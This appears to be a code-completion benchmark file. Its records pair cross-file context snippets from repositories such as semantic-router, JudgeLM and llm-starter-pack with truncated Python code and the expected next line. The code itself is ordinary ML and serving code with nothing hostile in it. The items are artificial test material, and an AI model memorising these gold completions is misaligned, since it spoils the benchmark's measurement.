self.cond_layer = torch.nn.utils.weight_norm(cond_layer, name="weight")
for i in range(n_layers):
dilation = dilation_rate**i
padding = int((kernel_size * dilation - dilation) / 2)
in_layer = torch.nn.Conv1d(
hidden_channels,
2 * hidden_channels,
kernel_size,
dilation=dilation,
padding=padding,
)
in_layer = torch.nn.utils.weight_norm(in_layer, name="weight")
self.in_layers.append(in_layer)
# last one is not necessary
if i < n_layers - 1:
res_skip_channels = 2 * hidden_channels
else:
res_skip_channels = hidden_channels
res_skip_layer = torch.nn.Conv1d(hidden_channels, res_skip_channels, 1)
res_skip_layer = torch.nn.utils.weight_norm(res_skip_layer, name="weight")
self.res_skip_layers.append(res_skip_layer)
def forward(self, x, x_mask, g=None, **kwargs):
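# WaveNet-style stack: each layer applies a dilated conv and a gated tanh/sigmoid activation (optionally conditioned on g), then splits into residual and skip paths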
output = torch.zeros_like(x)
n_channels_tensor = torch.IntTensor([self.hidden_channels])
if g is not None:
g = self.cond_layer(g)
for i in range(self.n_layers):
x_in = self.in_layers[i](x)
if g is not None:
cond_offset = i * 2 * self.hidden_channels
g_l = g[:, cond_offset : cond_offset + 2 * self.hidden_channels, :]
else:
g_l = torch.zeros_like(x_in)
acts = commons.fused_add_tanh_sigmoid_multiply(x_in, g_l, n_channels_tensor)
acts = self.drop(acts)
res_skip_acts = self.res_skip_layers[i](acts)
if i < self.n_layers - 1:
res_acts = res_skip_acts[:, : self.hidden_channels, :]
x = (x + res_acts) * x_mask
output = output + res_skip_acts[:, self.hidden_channels :, :]
else:
output = output + res_skip_acts
return output * x_mask
def remove_weight_norm(self):
if self.gin_channels != 0:
torch.nn.utils.remove_weight_norm(self.cond_layer)
for l in self.in_layers:
torch.nn.utils.remove_weight_norm(l)
for l in self.res_skip_layers:
torch.nn.utils.remove_weight_norm(l)
class ResBlock1(torch.nn.Module):
def __init__(self, channels, kernel_size=3, dilation=(1, 3, 5)):
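# HiFi-GAN-style residual block: weight-normalised dilated Conv1d layers (dilations 1, 3, 5 by default) with padding chosen to preserve sequence length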
super(ResBlock1, self).__init__()
self.convs1 = nn.ModuleList(
[
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[0],
padding=get_padding(kernel_size, dilation[0]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[1],
padding=get_padding(kernel_size, dilation[1]),
)
),
weight_norm(
Conv1d(
channels,
channels,
kernel_size,
1,
dilation=dilation[2],
padding=get_padding(kernel_size, dilation[2]),
)
),
]
) | self.convs1.apply(init_weights) | 1 | 2023-10-28 01:58:49+00:00 | 4k |
aurelio-labs/semantic-router | semantic_router/layer.py | [
{
"identifier": "BaseEncoder",
"path": "semantic_router/encoders/base.py",
"snippet": "class BaseEncoder(BaseModel):\n name: str\n score_threshold: float\n type: str = Field(default=\"base\")\n\n class Config:\n arbitrary_types_allowed = True\n\n def __call__(self, docs: List[str]) -> List[List[float]]:\n raise NotImplementedError(\"Subclasses must implement this method\")"
},
{
"identifier": "OpenAIEncoder",
"path": "semantic_router/encoders/openai.py",
"snippet": "class OpenAIEncoder(BaseEncoder):\n client: Optional[openai.Client]\n type: str = \"openai\"\n\n def __init__(\n self,\n name: Optional[str] = None,\n openai_api_key: Optional[str] = None,\n score_threshold: float = 0.82,\n ):\n if name is None:\n name = os.getenv(\"OPENAI_MODEL_NAME\", \"text-embedding-ada-002\")\n super().__init__(name=name, score_threshold=score_threshold)\n api_key = openai_api_key or os.getenv(\"OPENAI_API_KEY\")\n if api_key is None:\n raise ValueError(\"OpenAI API key cannot be 'None'.\")\n try:\n self.client = openai.Client(api_key=api_key)\n except Exception as e:\n raise ValueError(\n f\"OpenAI API client failed to initialize. Error: {e}\"\n ) from e\n\n def __call__(self, docs: List[str]) -> List[List[float]]:\n if self.client is None:\n raise ValueError(\"OpenAI client is not initialized.\")\n embeds = None\n error_message = \"\"\n\n # Exponential backoff\n for j in range(3):\n try:\n embeds = self.client.embeddings.create(input=docs, model=self.name)\n if embeds.data:\n break\n except OpenAIError as e:\n sleep(2**j)\n error_message = str(e)\n logger.warning(f\"Retrying in {2**j} seconds...\")\n except Exception as e:\n logger.error(f\"OpenAI API call failed. Error: {error_message}\")\n raise ValueError(f\"OpenAI API call failed. Error: {e}\") from e\n\n if (\n not embeds\n or not isinstance(embeds, CreateEmbeddingResponse)\n or not embeds.data\n ):\n raise ValueError(f\"No embeddings returned. Error: {error_message}\")\n\n embeddings = [embeds_obj.embedding for embeds_obj in embeds.data]\n return embeddings"
},
{
"identifier": "similarity_matrix",
"path": "semantic_router/linear.py",
"snippet": "def similarity_matrix(xq: np.ndarray, index: np.ndarray) -> np.ndarray:\n \"\"\"Compute the similarity scores between a query vector and a set of vectors.\n\n Args:\n xq: A query vector (1d ndarray)\n index: A set of vectors.\n\n Returns:\n The similarity between the query vector and the set of vectors.\n \"\"\"\n\n index_norm = norm(index, axis=1)\n xq_norm = norm(xq.T)\n sim = np.dot(index, xq.T) / (index_norm * xq_norm)\n return sim"
},
{
"identifier": "top_scores",
"path": "semantic_router/linear.py",
"snippet": "def top_scores(sim: np.ndarray, top_k: int = 5) -> Tuple[np.ndarray, np.ndarray]:\n # get indices of top_k records\n top_k = min(top_k, sim.shape[0])\n idx = np.argpartition(sim, -top_k)[-top_k:]\n scores = sim[idx]\n\n return scores, idx"
},
{
"identifier": "BaseLLM",
"path": "semantic_router/llms/base.py",
"snippet": "class BaseLLM(BaseModel):\n name: str\n\n class Config:\n arbitrary_types_allowed = True\n\n def __init__(self, name: str, **kwargs):\n super().__init__(name=name, **kwargs)\n\n def __call__(self, messages: List[Message]) -> Optional[str]:\n raise NotImplementedError(\"Subclasses must implement this method\")\n\n def _is_valid_inputs(\n self, inputs: dict[str, Any], function_schema: dict[str, Any]\n ) -> bool:\n \"\"\"Validate the extracted inputs against the function schema\"\"\"\n try:\n # Extract parameter names and types from the signature string\n signature = function_schema[\"signature\"]\n param_info = [param.strip() for param in signature[1:-1].split(\",\")]\n param_names = [info.split(\":\")[0].strip() for info in param_info]\n param_types = [\n info.split(\":\")[1].strip().split(\"=\")[0].strip() for info in param_info\n ]\n\n for name, type_str in zip(param_names, param_types):\n if name not in inputs:\n logger.error(f\"Input {name} missing from query\")\n return False\n return True\n except Exception as e:\n logger.error(f\"Input validation error: {str(e)}\")\n return False\n\n def extract_function_inputs(\n self, query: str, function_schema: dict[str, Any]\n ) -> dict:\n logger.info(\"Extracting function input...\")\n\n prompt = f\"\"\"\n You are a helpful assistant designed to output JSON.\n Given the following function schema\n << {function_schema} >>\n and query\n << {query} >>\n extract the parameters values from the query, in a valid JSON format.\n Example:\n Input:\n query: \"How is the weather in Hawaii right now in International units?\"\n schema:\n {{\n \"name\": \"get_weather\",\n \"description\": \"Useful to get the weather in a specific location\",\n \"signature\": \"(location: str, degree: str) -> str\",\n \"output\": \"<class 'str'>\",\n }}\n\n Result: {{\n \"location\": \"London\",\n \"degree\": \"Celsius\",\n }}\n\n Input:\n query: {query}\n schema: {function_schema}\n Result:\n \"\"\"\n llm_input = [Message(role=\"user\", content=prompt)]\n output = self(llm_input)\n if not output:\n raise Exception(\"No output generated for extract function input\")\n\n output = output.replace(\"'\", '\"').strip().rstrip(\",\")\n\n function_inputs = json.loads(output)\n if not self._is_valid_inputs(function_inputs, function_schema):\n raise ValueError(\"Invalid inputs\")\n return function_inputs"
},
{
"identifier": "OpenAILLM",
"path": "semantic_router/llms/openai.py",
"snippet": "class OpenAILLM(BaseLLM):\n client: Optional[openai.OpenAI]\n temperature: Optional[float]\n max_tokens: Optional[int]\n\n def __init__(\n self,\n name: Optional[str] = None,\n openai_api_key: Optional[str] = None,\n temperature: float = 0.01,\n max_tokens: int = 200,\n ):\n if name is None:\n name = os.getenv(\"OPENAI_CHAT_MODEL_NAME\", \"gpt-3.5-turbo\")\n super().__init__(name=name)\n api_key = openai_api_key or os.getenv(\"OPENAI_API_KEY\")\n if api_key is None:\n raise ValueError(\"OpenAI API key cannot be 'None'.\")\n try:\n self.client = openai.OpenAI(api_key=api_key)\n except Exception as e:\n raise ValueError(\n f\"OpenAI API client failed to initialize. Error: {e}\"\n ) from e\n self.temperature = temperature\n self.max_tokens = max_tokens\n\n def __call__(self, messages: List[Message]) -> str:\n if self.client is None:\n raise ValueError(\"OpenAI client is not initialized.\")\n try:\n completion = self.client.chat.completions.create(\n model=self.name,\n messages=[m.to_openai() for m in messages],\n temperature=self.temperature,\n max_tokens=self.max_tokens,\n )\n\n output = completion.choices[0].message.content\n\n if not output:\n raise Exception(\"No output generated\")\n return output\n except Exception as e:\n logger.error(f\"LLM error: {e}\")\n raise Exception(f\"LLM error: {e}\") from e"
},
{
"identifier": "Route",
"path": "semantic_router/route.py",
"snippet": "class Route(BaseModel):\n name: str\n utterances: List[str]\n description: Optional[str] = None\n function_schema: Optional[Dict[str, Any]] = None\n llm: Optional[BaseLLM] = None\n\n def __call__(self, query: str) -> RouteChoice:\n if self.function_schema:\n if not self.llm:\n raise ValueError(\n \"LLM is required for dynamic routes. Please ensure the `llm` \"\n \"attribute is set.\"\n )\n # if a function schema is provided we generate the inputs\n extracted_inputs = self.llm.extract_function_inputs(\n query=query, function_schema=self.function_schema\n )\n func_call = extracted_inputs\n else:\n # otherwise we just pass None for the call\n func_call = None\n return RouteChoice(name=self.name, function_call=func_call)\n\n def to_dict(self) -> Dict[str, Any]:\n return self.dict()\n\n @classmethod\n def from_dict(cls, data: Dict[str, Any]):\n return cls(**data)\n\n @classmethod\n def from_dynamic_route(cls, llm: BaseLLM, entity: Union[BaseModel, Callable]):\n \"\"\"\n Generate a dynamic Route object from a function or Pydantic model using LLM\n \"\"\"\n schema = function_call.get_schema(item=entity)\n dynamic_route = cls._generate_dynamic_route(llm=llm, function_schema=schema)\n dynamic_route.function_schema = schema\n return dynamic_route\n\n @classmethod\n def _parse_route_config(cls, config: str) -> str:\n # Regular expression to match content inside <config></config>\n config_pattern = r\"<config>(.*?)</config>\"\n match = re.search(config_pattern, config, re.DOTALL)\n\n if match:\n config_content = match.group(1).strip() # Get the matched content\n return config_content\n else:\n raise ValueError(\"No <config></config> tags found in the output.\")\n\n @classmethod\n def _generate_dynamic_route(cls, llm: BaseLLM, function_schema: Dict[str, Any]):\n logger.info(\"Generating dynamic route...\")\n\n prompt = f\"\"\"\nYou are tasked to generate a JSON configuration based on the provided\nfunction schema. Please follow the template below, no other tokens allowed:\n\n<config>\n{{\n \"name\": \"<function_name>\",\n \"utterances\": [\n \"<example_utterance_1>\",\n \"<example_utterance_2>\",\n \"<example_utterance_3>\",\n \"<example_utterance_4>\",\n \"<example_utterance_5>\"]\n}}\n</config>\n\nOnly include the \"name\" and \"utterances\" keys in your answer.\nThe \"name\" should match the function name and the \"utterances\"\nshould comprise a list of 5 example phrases that could be used to invoke\nthe function. Use real values instead of placeholders.\n\nInput schema:\n{function_schema}\n\"\"\"\n\n llm_input = [Message(role=\"user\", content=prompt)]\n output = llm(llm_input)\n if not output:\n raise Exception(\"No output generated for dynamic route\")\n\n route_config = cls._parse_route_config(config=output)\n\n logger.info(f\"Generated route config:\\n{route_config}\")\n\n if is_valid(route_config):\n route_config_dict = json.loads(route_config)\n route_config_dict[\"llm\"] = llm\n return Route.from_dict(route_config_dict)\n raise Exception(\"No config generated\")"
},
{
"identifier": "Encoder",
"path": "semantic_router/schema.py",
"snippet": "class Encoder:\n type: EncoderType\n name: Optional[str]\n model: BaseEncoder\n\n def __init__(self, type: str, name: Optional[str]):\n self.type = EncoderType(type)\n self.name = name\n if self.type == EncoderType.HUGGINGFACE:\n raise NotImplementedError\n elif self.type == EncoderType.FASTEMBED:\n self.model = FastEmbedEncoder(name=name)\n elif self.type == EncoderType.OPENAI:\n self.model = OpenAIEncoder(name=name)\n elif self.type == EncoderType.COHERE:\n self.model = CohereEncoder(name=name)\n else:\n raise ValueError\n\n def __call__(self, texts: List[str]) -> List[List[float]]:\n return self.model(texts)"
},
{
"identifier": "EncoderType",
"path": "semantic_router/schema.py",
"snippet": "class EncoderType(Enum):\n HUGGINGFACE = \"huggingface\"\n FASTEMBED = \"fastembed\"\n OPENAI = \"openai\"\n COHERE = \"cohere\""
},
{
"identifier": "RouteChoice",
"path": "semantic_router/schema.py",
"snippet": "class RouteChoice(BaseModel):\n name: Optional[str] = None\n function_call: Optional[dict] = None\n similarity_score: Optional[float] = None\n trigger: Optional[bool] = None"
},
{
"identifier": "logger",
"path": "semantic_router/utils/logger.py",
"snippet": "class CustomFormatter(colorlog.ColoredFormatter):\n def __init__(self):\ndef add_coloured_handler(logger):\ndef setup_custom_logger(name):"
}
] | import json
import os
import numpy as np
import yaml
from typing import Any, Dict, List, Optional, Tuple
from semantic_router.encoders import BaseEncoder, OpenAIEncoder
from semantic_router.linear import similarity_matrix, top_scores
from semantic_router.llms import BaseLLM, OpenAILLM
from semantic_router.route import Route
from semantic_router.schema import Encoder, EncoderType, RouteChoice
from semantic_router.utils.logger import logger | 3,327 |
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys:
|
def is_valid(layer_config: str) -> bool:
"""Make sure the given string is json format and contains the 3 keys: ["encoder_name", "encoder_type", "routes"]"""
try:
output_json = json.loads(layer_config)
required_keys = ["encoder_name", "encoder_type", "routes"]
if isinstance(output_json, list):
for item in output_json:
missing_keys = [key for key in required_keys if key not in item]
if missing_keys: | logger.warning( | 10 | 2023-10-30 12:12:45+00:00 | 4k |
baaivision/JudgeLM | judgelm/serve/model_worker.py | [
{
"identifier": "WORKER_HEART_BEAT_INTERVAL",
"path": "judgelm/constants.py",
"snippet": "WORKER_HEART_BEAT_INTERVAL = int(os.getenv(\"JUDGELM_WORKER_HEART_BEAT_INTERVAL\", 45))"
},
{
"identifier": "ErrorCode",
"path": "judgelm/constants.py",
"snippet": "class ErrorCode(IntEnum):\n \"\"\"\n https://platform.openai.com/docs/guides/error-codes/api-errors\n \"\"\"\n\n VALIDATION_TYPE_ERROR = 40001\n\n INVALID_AUTH_KEY = 40101\n INCORRECT_AUTH_KEY = 40102\n NO_PERMISSION = 40103\n\n INVALID_MODEL = 40301\n PARAM_OUT_OF_RANGE = 40302\n CONTEXT_OVERFLOW = 40303\n\n RATE_LIMIT = 42901\n QUOTA_EXCEEDED = 42902\n ENGINE_OVERLOADED = 42903\n\n INTERNAL_ERROR = 50001\n CUDA_OUT_OF_MEMORY = 50002\n GRADIO_REQUEST_ERROR = 50003\n GRADIO_STREAM_UNKNOWN_ERROR = 50004\n CONTROLLER_NO_WORKER = 50005\n CONTROLLER_WORKER_TIMEOUT = 50006"
},
{
"identifier": "SERVER_ERROR_MSG",
"path": "judgelm/constants.py",
"snippet": "SERVER_ERROR_MSG = (\n \"**NETWORK ERROR DUE TO HIGH TRAFFIC. PLEASE REGENERATE OR REFRESH THIS PAGE.**\"\n)"
},
{
"identifier": "get_conv_template",
"path": "judgelm/conversation.py",
"snippet": "def get_conv_template(name: str) -> Conversation:\n \"\"\"Get a conversation template.\"\"\"\n return conv_templates[name].copy()"
},
{
"identifier": "load_model",
"path": "judgelm/model/model_adapter.py",
"snippet": "def load_model(self, model_path: str, from_pretrained_kwargs: dict):\n revision = from_pretrained_kwargs.get(\"revision\", \"main\")\n try:\n tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n use_fast=self.use_fast_tokenizer,\n revision=revision,\n )\n except TypeError:\n tokenizer = AutoTokenizer.from_pretrained(\n model_path,\n use_fast=False,\n revision=revision,\n )\n try:\n model = AutoModelForCausalLM.from_pretrained(\n model_path, low_cpu_mem_usage=True, **from_pretrained_kwargs\n )\n except NameError:\n model = AutoModel.from_pretrained(\n model_path, low_cpu_mem_usage=True, **from_pretrained_kwargs\n )\n return model, tokenizer"
},
{
"identifier": "add_model_args",
"path": "judgelm/model/model_adapter.py",
"snippet": "def add_model_args(parser):\n parser.add_argument(\n \"--model-path\",\n type=str,\n default=\"lmsys/vicuna-7b-v1.3\",\n help=\"The path to the weights. This can be a local folder or a Hugging Face repo ID.\",\n )\n parser.add_argument(\n \"--revision\",\n type=str,\n default=\"main\",\n help=\"Hugging Face Hub model revision identifier\",\n )\n parser.add_argument(\n \"--device\",\n type=str,\n choices=[\"cpu\", \"cuda\", \"mps\", \"xpu\"],\n default=\"cuda\",\n help=\"The device type\",\n )\n parser.add_argument(\n \"--gpus\",\n type=str,\n default=None,\n help=\"A single GPU like 1 or multiple GPUs like 0,2\",\n )\n parser.add_argument(\"--num-gpus\", type=int, default=1)\n parser.add_argument(\n \"--max-gpu-memory\",\n type=str,\n help=\"The maximum memory per gpu. Use a string like '13Gib'\",\n )\n parser.add_argument(\n \"--load-8bit\", action=\"store_true\", help=\"Use 8-bit quantization\"\n )\n parser.add_argument(\n \"--cpu-offloading\",\n action=\"store_true\",\n help=\"Only when using 8-bit quantization: Offload excess weights to the CPU that don't fit on the GPU\",\n )\n parser.add_argument(\n \"--gptq-ckpt\",\n type=str,\n default=None,\n help=\"Load quantized model. The path to the local GPTQ checkpoint.\",\n )\n parser.add_argument(\n \"--gptq-wbits\",\n type=int,\n default=16,\n choices=[2, 3, 4, 8, 16],\n help=\"#bits to use for quantization\",\n )\n parser.add_argument(\n \"--gptq-groupsize\",\n type=int,\n default=-1,\n help=\"Groupsize to use for quantization; default uses full row.\",\n )\n parser.add_argument(\n \"--gptq-act-order\",\n action=\"store_true\",\n help=\"Whether to apply the activation order GPTQ heuristic\",\n )"
},
{
"identifier": "get_conversation_template",
"path": "judgelm/model/model_adapter.py",
"snippet": "def get_conversation_template(model_path: str) -> Conversation:\n \"\"\"Get the default conversation template.\"\"\"\n adapter = get_model_adapter(model_path)\n return adapter.get_default_conv_template(model_path)"
},
{
"identifier": "get_generate_stream_function",
"path": "judgelm/model/model_adapter.py",
"snippet": "def get_generate_stream_function(model: torch.nn.Module, model_path: str):\n \"\"\"Get the generate_stream function for inference.\"\"\"\n from judgelm.serve.inference import generate_stream\n\n model_type = str(type(model)).lower()\n is_chatglm = \"chatglm\" in model_type\n is_falcon = \"rwforcausallm\" in model_type\n is_codet5p = \"codet5p\" in model_type\n is_peft = \"peft\" in model_type\n\n if is_chatglm:\n return generate_stream_chatglm\n elif is_falcon:\n return generate_stream_falcon\n elif is_codet5p:\n return generate_stream_codet5p\n elif peft_share_base_weights and is_peft:\n # Return a curried stream function that loads the right adapter\n # according to the model_name available in this context. This ensures\n # the right weights are available.\n @torch.inference_mode()\n def generate_stream_peft(\n model,\n tokenizer,\n params: Dict,\n device: str,\n context_len: int,\n stream_interval: int = 2,\n judge_sent_end: bool = False,\n ):\n model.set_adapter(model_path)\n for x in generate_stream(\n model,\n tokenizer,\n params,\n device,\n context_len,\n stream_interval,\n judge_sent_end,\n ):\n yield x\n\n return generate_stream_peft\n else:\n return generate_stream"
},
{
"identifier": "GptqConfig",
"path": "judgelm/modules/gptq.py",
"snippet": "class GptqConfig:\n ckpt: str = field(\n default=None,\n metadata={\n \"help\": \"Load quantized model. The path to the local GPTQ checkpoint.\"\n },\n )\n wbits: int = field(default=16, metadata={\"help\": \"#bits to use for quantization\"})\n groupsize: int = field(\n default=-1,\n metadata={\"help\": \"Groupsize to use for quantization; default uses full row.\"},\n )\n act_order: bool = field(\n default=True,\n metadata={\"help\": \"Whether to apply the activation order GPTQ heuristic\"},\n )"
},
{
"identifier": "build_logger",
"path": "judgelm/utils.py",
"snippet": "def build_logger(logger_name, logger_filename):\n global handler\n\n formatter = logging.Formatter(\n fmt=\"%(asctime)s | %(levelname)s | %(name)s | %(message)s\",\n datefmt=\"%Y-%m-%d %H:%M:%S\",\n )\n\n # Set the format of root handlers\n if not logging.getLogger().handlers:\n if sys.version_info[1] >= 9:\n # This is for windows\n logging.basicConfig(level=logging.INFO, encoding=\"utf-8\")\n else:\n if platform.system() == \"Windows\":\n warnings.warn(\n \"If you are running on Windows, \"\n \"we recommend you use Python >= 3.9 for UTF-8 encoding.\"\n )\n logging.basicConfig(level=logging.INFO)\n logging.getLogger().handlers[0].setFormatter(formatter)\n\n # Redirect stdout and stderr to loggers\n stdout_logger = logging.getLogger(\"stdout\")\n stdout_logger.setLevel(logging.INFO)\n sl = StreamToLogger(stdout_logger, logging.INFO)\n sys.stdout = sl\n\n stderr_logger = logging.getLogger(\"stderr\")\n stderr_logger.setLevel(logging.ERROR)\n sl = StreamToLogger(stderr_logger, logging.ERROR)\n sys.stderr = sl\n\n # Get logger\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.INFO)\n\n os.makedirs(LOGDIR, exist_ok=True)\n filename = os.path.join(LOGDIR, logger_filename)\n handler = logging.handlers.TimedRotatingFileHandler(\n filename, when=\"D\", utc=True, encoding=\"utf-8\"\n )\n handler.setFormatter(formatter)\n\n for l in [stdout_logger, stderr_logger, logger]:\n if l in visited_loggers:\n continue\n visited_loggers.add(l)\n l.addHandler(handler)\n\n return logger"
},
{
"identifier": "pretty_print_semaphore",
"path": "judgelm/utils.py",
"snippet": "def pretty_print_semaphore(semaphore):\n \"\"\"Print a semaphore in better format.\"\"\"\n if semaphore is None:\n return \"None\"\n return f\"Semaphore(value={semaphore._value}, locked={semaphore.locked()})\""
},
{
"identifier": "get_context_length",
"path": "judgelm/utils.py",
"snippet": "def get_context_length(config):\n \"\"\"Get the context length of a model from a huggingface model config.\"\"\"\n for key in SEQUENCE_LENGTH_KEYS:\n val = getattr(config, key, None)\n if val is not None:\n return val\n return 2048"
}
] | import argparse
import asyncio
import dataclasses
import logging
import json
import os
import time
import threading
import uuid
import requests
import torch
import torch.nn.functional as F
import uvicorn
from typing import List
from fastapi import FastAPI, Request, BackgroundTasks
from fastapi.responses import StreamingResponse, JSONResponse
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LlamaTokenizer,
AutoModel,
)
from transformers import (
AutoTokenizer,
AutoModelForCausalLM,
LLaMATokenizer,
AutoModel,
)
from judgelm.constants import WORKER_HEART_BEAT_INTERVAL, ErrorCode, SERVER_ERROR_MSG
from judgelm.conversation import get_conv_template
from judgelm.model.model_adapter import (
load_model,
add_model_args,
get_conversation_template,
get_generate_stream_function,
)
from judgelm.modules.gptq import GptqConfig
from judgelm.utils import build_logger, pretty_print_semaphore, get_context_length | 3,453 | self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
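# register with the controller, then keep reporting liveness from a background thread (see heart_beat_worker)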
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...")
| """
A model worker that executes the model.
"""
try:
except ImportError:
worker_id = str(uuid.uuid4())[:8]
logger = build_logger("model_worker", f"gradio_output/model_worker_{worker_id}.log")
app = FastAPI()
def heart_beat_worker(obj):
while True:
time.sleep(WORKER_HEART_BEAT_INTERVAL)
obj.send_heart_beat()
class BaseModelWorker:
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
conv_template: str = None,
):
self.controller_addr = controller_addr
self.worker_addr = worker_addr
self.worker_id = worker_id
if model_path.endswith("/"):
model_path = model_path[:-1]
self.model_names = model_names or [model_path.split("/")[-1]]
self.limit_worker_concurrency = limit_worker_concurrency
if conv_template:
self.conv = get_conv_template(conv_template)
else:
self.conv = get_conversation_template(model_path)
self.conv.sep_style = int(self.conv.sep_style)
self.tokenizer = None
self.context_len = None
self.call_ct = 0
self.semaphore = None
self.heart_beat_thread = None
def init_heart_beat(self):
self.register_to_controller()
self.heart_beat_thread = threading.Thread(
target=heart_beat_worker, args=(self,)
)
self.heart_beat_thread.start()
def register_to_controller(self):
logger.info("Register to controller")
url = self.controller_addr + "/register_worker"
data = {
"worker_name": self.worker_addr,
"check_heart_beat": True,
"worker_status": self.get_status(),
}
r = requests.post(url, json=data)
assert r.status_code == 200
def send_heart_beat(self):
logger.info(
f"Send heart beat. Models: {self.model_names}. "
f"Semaphore: {pretty_print_semaphore(self.semaphore)}. "
f"call_ct: {self.call_ct}. "
f"worker_id: {self.worker_id}. "
)
url = self.controller_addr + "/receive_heart_beat"
while True:
try:
ret = requests.post(
url,
json={
"worker_name": self.worker_addr,
"queue_length": self.get_queue_length(),
},
timeout=5,
)
exist = ret.json()["exist"]
break
except requests.exceptions.RequestException as e:
logger.error(f"heart beat error: {e}")
time.sleep(5)
if not exist:
self.register_to_controller()
def get_queue_length(self):
if (
self.semaphore is None
or self.semaphore._value is None
or self.semaphore._waiters is None
):
return 0
else:
return (
self.limit_worker_concurrency
- self.semaphore._value
+ len(self.semaphore._waiters)
)
def get_status(self):
return {
"model_names": self.model_names,
"speed": 1,
"queue_length": self.get_queue_length(),
}
def count_token(self, params):
prompt = params["prompt"]
input_ids = self.tokenizer(prompt).input_ids
input_echo_len = len(input_ids)
ret = {
"count": input_echo_len,
"error_code": 0,
}
return ret
def get_conv_template(self):
return {"conv": self.conv}
class ModelWorker(BaseModelWorker):
def __init__(
self,
controller_addr: str,
worker_addr: str,
worker_id: str,
model_path: str,
model_names: List[str],
limit_worker_concurrency: int,
no_register: bool,
device: str,
num_gpus: int,
max_gpu_memory: str,
load_8bit: bool = False,
cpu_offloading: bool = False,
gptq_config: bool = None,
stream_interval: int = 2,
conv_template: str = None,
):
super().__init__(
controller_addr,
worker_addr,
worker_id,
model_path,
model_names,
limit_worker_concurrency,
conv_template=conv_template,
)
logger.info(f"Loading the model {self.model_names} on worker {worker_id} ...") | self.model, self.tokenizer = load_model( | 4 | 2023-10-26 19:41:07+00:00 | 4k |
cncf/llm-starter-pack | bot.py | [
{
"identifier": "create_vector_index",
"path": "utils.py",
"snippet": "def create_vector_index(driver, dimension: int) -> None:\n index_query = \"CALL db.index.vector.createNodeIndex('stackoverflow', 'Question', 'embedding', $dimension, 'cosine')\"\n try:\n driver.query(index_query, {\"dimension\": dimension})\n except: # Already exists\n pass\n index_query = \"CALL db.index.vector.createNodeIndex('top_answers', 'Answer', 'embedding', $dimension, 'cosine')\"\n try:\n driver.query(index_query, {\"dimension\": dimension})\n except: # Already exists\n pass"
},
{
"identifier": "load_embedding_model",
"path": "chains.py",
"snippet": "def load_embedding_model(embedding_model_name: str, logger=BaseLogger(), config={}):\n if embedding_model_name == \"ollama\":\n embeddings = OllamaEmbeddings(\n base_url=config[\"ollama_base_url\"], model=\"llama2\"\n )\n dimension = 4096\n logger.info(\"Embedding: Using Ollama\")\n else:\n embeddings = SentenceTransformerEmbeddings(\n model_name=\"all-MiniLM-L6-v2\", cache_folder=\"/embedding_model\"\n )\n dimension = 384\n logger.info(\"Embedding: Using SentenceTransformer\")\n return embeddings, dimension"
},
{
"identifier": "load_llm",
"path": "chains.py",
"snippet": "def load_llm(llm_name: str, logger=BaseLogger(), config={}):\n if len(llm_name):\n logger.info(f\"LLM: Using Ollama: {llm_name}\")\n return ChatOllama(\n temperature=0,\n base_url=config[\"ollama_base_url\"],\n model=llm_name,\n streaming=True,\n # seed=2,\n top_k=10, # A higher value (100) will give more diverse answers, while a lower value (10) will be more conservative.\n top_p=0.3, # Higher value (0.95) will lead to more diverse text, while a lower value (0.5) will generate more focused text.\n num_ctx=3072, # Sets the size of the context window used to generate the next token.\n )"
},
{
"identifier": "configure_llm_only_chain",
"path": "chains.py",
